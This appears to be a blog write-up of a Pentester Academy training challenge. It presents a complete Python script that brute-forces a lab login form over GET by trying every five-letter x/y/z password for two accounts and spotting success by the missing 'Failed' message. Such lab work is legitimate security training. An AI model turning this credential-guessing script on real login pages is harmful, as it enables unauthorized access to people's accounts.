Pentester Academy GET Method Challenge 1 via Python
The Challenge 1 for Pentester Academy uses GET method for
sending over the credentials. So the username and password go like:
Also one big hint dropped here is that the domain is PentesterAcademy.com. So the email addresses would look like admin@PentesterAcademy.com and jack@PentesterAacademy.com.
I reused the code for generating all combinations of x, y
and z from my previous
blog post aimed at challenge 3. We just need to update the URL with the
username and the password while sending the request for each combination.
But how do we verify if the credentials have been accepted as valid or rejected? The webpage says “Failed! Please try again!” if the credentials are rejected. So we can search for the string “Failed” in the response to check if the credentials were accepted.
The complete
solutions looks as follows:
import urllib2
import sys
def fun(a):
chars="xyz"
l = len(a)
lenthPerWord = len(a[0])
if lenthPerWord == 5:
return a
c=[]
for i in range(0,l):
for j in chars:
c.append(j+a[i])
return fun(c)
c=['x','y','z']
listOfPass=fun(c)
for user in
["admin","jack"]:
for password in listOfPass:
url =
("http://pentesteracademylab.appspot.com/lab/webapp/1?email=%s&password=%s")
%(user+"@PentesterAcademy.com",password)
r=urllib2.Request(url)
handle=urllib2.urlopen(r)
response = handle.read()
handle.close()
if not "Failed" in
str(response):
print "Succeeded for
"+user+":"+password
print str(response)
sys.exit(1)
else:
print "Failed for
"+user+":"+password
Comments
Post a Comment